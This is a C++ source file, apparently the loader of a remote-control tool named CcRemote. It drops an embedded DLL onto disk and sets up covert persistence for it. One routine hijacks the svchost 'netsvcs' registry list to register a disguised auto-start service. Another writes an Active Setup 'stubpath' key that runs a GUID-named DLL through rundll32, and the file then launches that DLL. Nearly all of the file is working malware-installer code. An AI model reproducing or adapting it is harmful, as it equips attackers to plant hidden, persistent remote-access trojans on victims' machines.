CcRemote/CcMainDll/Loder/Loder.cpp

// Loder.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//

#include <iostream>
#include <Windows.h>
#include "resource.h"
#include "RegEditEx.h"
#include <shlobj.h> 

#pragma comment(lib, "shell32.lib") 

bool CreateMyFile(const char* strFilePath, LPBYTE lpBuffer, DWORD dwSize)
{
	DWORD dwWritten;

	HANDLE hFile = CreateFile(strFilePath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
	if (hFile != NULL)
	{
		WriteFile(hFile, (LPCVOID)lpBuffer, dwSize, &dwWritten, NULL);
	}
	else
	{
		return false;
	}
	CloseHandle(hFile);
	return true;
}
//要释放的路径   资源ID            资源名
bool CreateEXE(const char* strFilePath, int nResourceID, const char* strResourceName)
{
	HRSRC hResInfo;
	HGLOBAL hResData;
	DWORD dwSize;
	LPBYTE p;
	// 查找所需的资源
	hResInfo = FindResource(NULL, MAKEINTRESOURCE(nResourceID), strResourceName);
	if (hResInfo == NULL)
	{
		//MessageBox(NULL, "查找资源失败！", "错误", MB_OK | MB_ICONINFORMATION);
		return false;
	}
	// 获得资源尺寸
	dwSize = SizeofResource(NULL, hResInfo);
	// 装载资源
	hResData = LoadResource(NULL, hResInfo);
	if (hResData == NULL)
	{
		//MessageBox(NULL, "装载资源失败！", "错误", MB_OK | MB_ICONINFORMATION);
		return false;
	}
	// 为数据分配空间
	p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
	if (p == NULL)
	{
		//MessageBox(NULL, "分配内存失败！", "错误", MB_OK | MB_ICONINFORMATION);
		return false;
	}
	// 复制资源数据
	CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);

	bool bRet = CreateMyFile(strFilePath, p, dwSize);
	if (!bRet)
	{
		GlobalFree((HGLOBAL)p);
		return false;
	}

	GlobalFree((HGLOBAL)p);

	return true;
}

char *AddsvchostService()
{
	char	*lpServiceName = NULL;
	int rc = 0;
	HKEY hkRoot;
	char buff[2048];
	//打开装所有svchost服务名的注册表键
	//query svchost setting
	char *ptr;
	char pSvchost[] = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost";
	rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pSvchost, 0, KEY_ALL_ACCESS, &hkRoot);
	if (ERROR_SUCCESS != rc)
		return NULL;

	DWORD type, size = sizeof buff;
	//枚举他所有的服务名
	rc = RegQueryValueEx(hkRoot, "netsvcs", 0, &type, (unsigned char*)buff, &size);
	SetLastError(rc);
	if (ERROR_SUCCESS != rc)
		RegCloseKey(hkRoot);

	int i = 0;
	bool bExist = false;
	char servicename[50];
	do
	{
		//这里获得类似这样的服务名netsvcs_0，netsvcs_1。。。。。。。
		wsprintf(servicename, "netsvcs_0x%d", i);
		for (ptr = buff; *ptr; ptr = strchr(ptr, 0) + 1)
		{
			//然后比对一下服务名中是否有这个名字了
			if (lstrcmpi(ptr, servicename) == 0)
			{
				bExist = true;
				break;              //如果没有就跳出
			}
		}
		if (bExist == false)
			break;
		bExist = false;
		i++;
	} while (1);

	servicename[lstrlen(servicename) + 1] = '\0';
	//然后将这个服务名写到所有服务名的后面，
	//不要妄想，直接用api在一个注册表的键值后面添加一些信息
	memcpy(buff + size - 1, servicename, lstrlen(servicename) + 2);
	//然后将含有新服务名的缓冲区写入注册表，注册表里原有内容被覆盖
	rc = RegSetValueEx(hkRoot, "netsvcs", 0, REG_MULTI_SZ, (unsigned char*)buff, size + lstrlen(servicename) + 1);

	RegCloseKey(hkRoot);

	SetLastError(rc);

	if (bExist == false)
	{
		lpServiceName = new char[lstrlen(servicename) + 1];
		lstrcpy(lpServiceName, servicename);
	}
	//回到 InstallService
	return lpServiceName;
}

void StartService(LPCTSTR lpService)
{
	SC_HANDLE hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
	if (NULL != hSCManager)
	{
		SC_HANDLE hService = OpenService(hSCManager, lpService, DELETE | SERVICE_START);
		if (NULL != hService)
		{
			StartService(hService, 0, NULL);
			CloseServiceHandle(hService);
			printf("lpService");
		}
		CloseServiceHandle(hSCManager);
	}
}


int ServerSetup()
{

	//CreateEXE("E:\\aaa.dll", IDR_DLL1, "DLL");
	char lpServiceDescription[]= "CcRemote服务";
	char strModulePath[MAX_PATH];
	char	strSysDir[MAX_PATH];
	char strSubKey[1024];
	DWORD	dwStartType = 0;
	char	strRegKey[1024];
	int rc = 0;
	HKEY hkRoot = HKEY_LOCAL_MACHINE, hkParam = 0;
	SC_HANDLE hscm = NULL, schService = NULL;

	//打开服务
	hscm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
	GetSystemDirectory(strSysDir, sizeof(strSysDir));
	char bin[] = "%SystemRoot%\\System32\\svchost.exe -k netsvcs";
	char *lpServiceName = AddsvchostService();                             //*添加的代码在这个函数中*
	char lpServiceDisplayName[128] = {0};
	wsprintf(lpServiceDisplayName, "%s_ms,", lpServiceName);
	//这里返回新的服务名后就构造服务dll的名字
	memset(strModulePath, 0, sizeof(strModulePath));
	wsprintf(strModulePath, "%s\\%sex.dll", strSysDir, lpServiceName);

	//然后构造服务中的描述信息的位置
	wsprintf(strRegKey, "MACHINE\\SYSTEM\\CurrentControlSet\\Services\\%s", lpServiceName);

	schService = CreateService(
		hscm,						// SCManager database
		lpServiceName,              // name of service
		lpServiceDisplayName,       // service name to display
		SERVICE_ALL_ACCESS,			// desired access
		SERVICE_WIN32_OWN_PROCESS,
		SERVICE_AUTO_START,			// start type
		SERVICE_ERROR_NORMAL,		// error control type
		bin,						// service's binary
		NULL,						// no load ordering group
		NULL,						// no tag identifier
		NULL,						// no dependencies
		NULL,						// LocalSystem account
		NULL);						// no password
	dwStartType = SERVICE_WIN32_OWN_PROCESS;

	if (schService == NULL)
	{
		throw "CreateService(Parameters)";
		printf("schServicenull");
	}
		

	CloseServiceHandle(schService);
	CloseServiceHandle(hscm);

	hkRoot = HKEY_LOCAL_MACHINE;
	//这里构造服务的描述键
	wsprintf(strSubKey, "SYSTEM\\CurrentControlSet\\Services\\%s", lpServiceName);
	if (dwStartType == SERVICE_WIN32_SHARE_PROCESS)
	{
		DWORD	dwServiceType = 0x120;

		//写入服务的描述
		WriteRegEx(HKEY_LOCAL_MACHINE, strSubKey, "Type", REG_DWORD, (char *)&dwServiceType, sizeof(DWORD), 0);
	}
	//写入服务的描述
	WriteRegEx(HKEY_LOCAL_MACHINE, strSubKey, "Description", REG_SZ, (char *)lpServiceDescription, lstrlen(lpServiceDescription), 0);

	lstrcat(strSubKey, "\\Parameters");
	//写入服务的描述
	WriteRegEx(HKEY_LOCAL_MACHINE, strSubKey, "ServiceDll", REG_EXPAND_SZ, (char *)strModulePath, lstrlen(strModulePath), 0);

	if (schService != NULL)
	{
		CreateEXE(strModulePath, IDR_DLL1, "DLL");
		StartService(lpServiceName);
	}
	RegCloseKey(hkRoot);
	RegCloseKey(hkParam);
	CloseServiceHandle(schService);
	CloseServiceHandle(hscm);
	system("pause");
	return 0;

}



BOOL GetNUM(char *num)
{
	CoInitialize(NULL);
	char buf[64] = { 0 };
	GUID guid;
	if (S_OK == ::CoCreateGuid(&guid))
	{
		_snprintf(buf, sizeof(buf)
			, "{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}"
			, guid.Data1
			, guid.Data2
			, guid.Data3
			, guid.Data4[0], guid.Data4[1], guid.Data4[2]
			, guid.Data4[3], guid.Data4[4], guid.Data4[5]
			, guid.Data4[6], guid.Data4[7]
		);
	}
	CoUninitialize();
	memcpy(num, buf, 64);
	return TRUE;
}

void ActiveXSetup()
{
	HKEY hKey;
	char strFileName[MAX_PATH];            // dll文件名
	char ActivexStr[1024];                 // 用于存储ActiveX的键字串
	char ActiveXPath[MAX_PATH];            // ActiveX路径
	char ActiveXKey[64];                   // ActiveX 的GUID字串
	char strCmdLine[MAX_PATH];             // 存储启动的命令行参数


	ZeroMemory(strFileName, MAX_PATH);
	ZeroMemory(ActiveXPath, MAX_PATH);
	ZeroMemory(ActivexStr, 1024);
	ZeroMemory(ActiveXKey, MAX_PATH);
	ZeroMemory(strCmdLine, MAX_PATH);

	//得到Activex路径
	strcpy(ActiveXPath, "SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\");
	//得到Activex的GUID
	GetNUM(ActiveXKey);
	//构造dll完整文件名
	//GetSystemDirectory(strFileName, MAX_PATH);
	SHGetSpecialFolderPath(NULL, strFileName, CSIDL_WINDOWS, TRUE);
	strcat(strFileName, "\\");
	strcat(strFileName, ActiveXKey);
	strcat(strFileName, ".dll");

	

	//构造ActiveX的注册表键值
	sprintf(ActivexStr, "%s%s", ActiveXPath, ActiveXKey);
	//创建这个注册表
	RegCreateKey(HKEY_LOCAL_MACHINE, ActivexStr, &hKey);

	//构造程序启动的命令行参数
	sprintf(strCmdLine, "%s %s,FirstRun", "rundll32.exe", strFileName);
	//将参数写道注册表中
	RegSetValueEx(hKey, "stubpath", 0, REG_EXPAND_SZ, (BYTE *)strCmdLine, lstrlen(strCmdLine));
	RegCloseKey(hKey);
	//释放文件
	CreateEXE(strFileName, IDR_DLL1, "DLL");

	//启动服务端
	STARTUPINFO StartInfo;
	PROCESS_INFORMATION ProcessInformation;
	StartInfo.cb = sizeof(STARTUPINFO);
	StartInfo.lpDesktop = NULL;
	StartInfo.lpReserved = NULL;
	StartInfo.lpTitle = NULL;
	StartInfo.dwFlags = STARTF_USESHOWWINDOW;
	StartInfo.cbReserved2 = 0;
	StartInfo.lpReserved2 = NULL;
	StartInfo.wShowWindow = SW_SHOWNORMAL;
	BOOL bReturn = CreateProcess(NULL, strCmdLine, NULL, NULL, FALSE, NULL, NULL, NULL, &StartInfo, &ProcessInformation);
	return;
}

int main()
{
	// TODO: Place code here.
	ActiveXSetup();
	return 0;
}